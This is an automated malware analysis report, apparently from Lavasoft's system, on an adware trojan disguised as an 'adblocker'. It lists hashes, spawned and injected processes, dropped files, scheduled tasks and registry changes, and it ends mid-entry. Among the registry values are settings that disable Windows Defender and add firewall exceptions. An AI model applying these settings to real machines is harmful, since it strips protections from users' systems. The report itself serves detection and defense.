Gen:Variant.Adware.PennyBee.6 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: fe4e0a2705e5b15832079b300c83de5e
SHA1: ba8dccde84f93dd9fcf6f0de672a435172879f83
SHA256: abbe5a0f3bdbc2aa4f5bcbc9047c7a68c4e12dcc9857f7c1af3892aa95b54871
SSDeep: 24576:NYShsisFlQ3IFz7ZimL826AhX5C9vcxIfOm4ue2qgFhX88Fk9qfDdeIZXGa5RMG:bsiAW3Ix7ZiahJC9kxmOmDR7EqLdeIZj
Size: 1541210 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company:
Created at: 2009-06-07 00:41:54
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:924
taeako.exe:900
taeako.exe:2352
taeako.exe:212
taeako.exe:972
taeako.exe:948
taeako.exe:2980
taeako.exe:2644
taeako.exe:1536
taeako.exe:544
taeako.exe:436
taedko.exe:1988
The Trojan injects its code into the following process(es):
taeako.exe:372
tae3ko.exe:1932
taedko.exe:1604
dag17797.exe:552
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.dll (39329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\utaujte.js (1447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (101002 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\adblocker_installer__1441686123.txt (16441 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (4 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\jquery4toolbar.js (3312 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe (13368 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3kod.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\khkiaff.js (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\TrayIcons\logo.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (569 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6ko.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\tae6kod.dll (39329 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\utils.exe (9527 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewko.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\narhokgeb.js (6 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeadko.bnp (14184 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\khkiaff.js (1856 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\utaujte.js (1447 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\taewdko.bnp (6584 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\content\jquery4toolbar.js (3312 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\tmp.bpu (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\nsislog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\CavnNotn.dll (0 bytes)
The process taeako.exe:212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (574 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (1156 bytes)
The process taeako.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Tasks\Tempo Runner tae3ko.job (1352 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe (1509 bytes)
%WinDir%\Tasks\Tempo Runner tae6ko.job (8112 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgub.dat (1528 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (2704 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (920 bytes)
%Documents and Settings%\All Users\Application Data\IlejwTivc\naspeomgu.dat (3072 bytes)
The Trojan deletes the following file(s):
%WinDir%\Tasks\Tempo Runner tae6ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner tae3ko.job (0 bytes)
%WinDir%\Tasks\Tempo Runner taedko.job (0 bytes)
%WinDir%\Tasks\Tempo adblocker Runner.job (0 bytes)
The process taedko.exe:1604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\lgv[1].js (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\8f43b50088266b9870b42ce6ef7ffbde_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cmp_ext[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\obbgint[1].js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58 (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ammbg[1].js (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7c0022298b948a99e406a6310bffea7f_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6 (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\7036a17d3eb33b65353aad26bf7fdd58_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cxeappconf[1].js (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\getcc[1].php (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8 (482 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\v1[1].htm (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ammapp[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\33143a2945258575fcad33e73ceb74c6_expire (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\3ab6cfcad30baf81fac23ae3890bffc8_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\287a420719c8b086bf7e963c3f582b1b_gb (32 bytes)
The process taedko.exe:1988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_gb (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\loader[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\kuhcaooqr\content\cache\9e5c6ea61c9caf16791b419f0698cf92_expire (13 bytes)
The process dag17797.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\SecondResult.txt (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\DSS_Unq_IMapplication_mon_remote[1].htm (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\OfferScreen_422.html (1969 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\nsDialogs.dll (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014041520140416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd4.tmp (0 bytes)
Registry activity
The process %original file name%.exe:924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"Publisher" = "adblocker"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayVersion" = "1.1.0.31"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"SetupType" = "71070"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayIcon" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\logo.ico"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"DisplayName" = "adblocker"
"UninstallString" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\Uninstaller.exe /ga=1503 /ai=121 /bi=0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 9F 63 AB DB 79 36 DA 6C 40 E6 3A F2 0F 8F B5"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\fe4e0a2705e5b15832079b300c83de5e\DEBUG]
"Trace Level"
The process taeako.exe:900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 37 C8 BF 8A 63 02 AF 3F D8 06 6E 13 2C 9C 27"
The process taeako.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 13 E6 58 A6 E0 D4 77 FB 5D 8E 1E C5 21 CF AA"
The process taeako.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{752B4A11-4D22-4FB3-a52F-C3CB66799418}]
"InstallDate" = "140526"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4B D6 B5 AE 9F B4 F3 2E 8A C5 85 0C 1A FD 33"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{661088FE-EBD0-4612-8C1E-C282158A658C}" = "v2.10|Action=Allow|Active=TRUE|Dir=In|App=%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe|Name=odufaik|"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\IlejwTivc]
"taeako.exe" = "%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe:*:Enabled:odufaik"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\taeako\DEBUG]
"Trace Level"
The process taeako.exe:972 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 38 B2 83 50 39 6E C0 71 A4 69 D3 07 67 CE 28"
The process taeako.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 7B C0 15 9B 16 8B 6E 90 07 D7 4A 29 ED 3A AF"
The process taeako.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 3F 72 81 8B 2A B7 25 C3 9B 28 0C A7 2E 9E 33"
The process taeako.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB BF 99 9A 97 CA 44 28 A6 55 D2 69 96 B0 02 7C"
The process taeako.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 74 BF C4 76 F0 2C DA 5B 97 7A 2B 1F 99 0F 21"
The process taeako.exe:544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 6D 06 43 63 FE 46 50 E7 CA FD 00 67 AD E6 CD"
The process taeako.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 A8 A8 34 93 CE AF 65 94 DA 06 09 05 47 93"
The process taeako.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 CD BE 57 BF 26 58 D1 B5 5E 09 03 26 10 47 F9"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\121_31]
"AMMDCS" = "1503"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process tae3ko.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 26 9A 4F 50 C8 5E 2F 44 B0 5B AD C9 05 D6 1A"
The process taedko.exe:1604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"AAD4DBA9766467aob23" = "60000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\AppdataLow\Software\jhaduposint\data]
"S132B7B8F1DC15ob23" = "12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
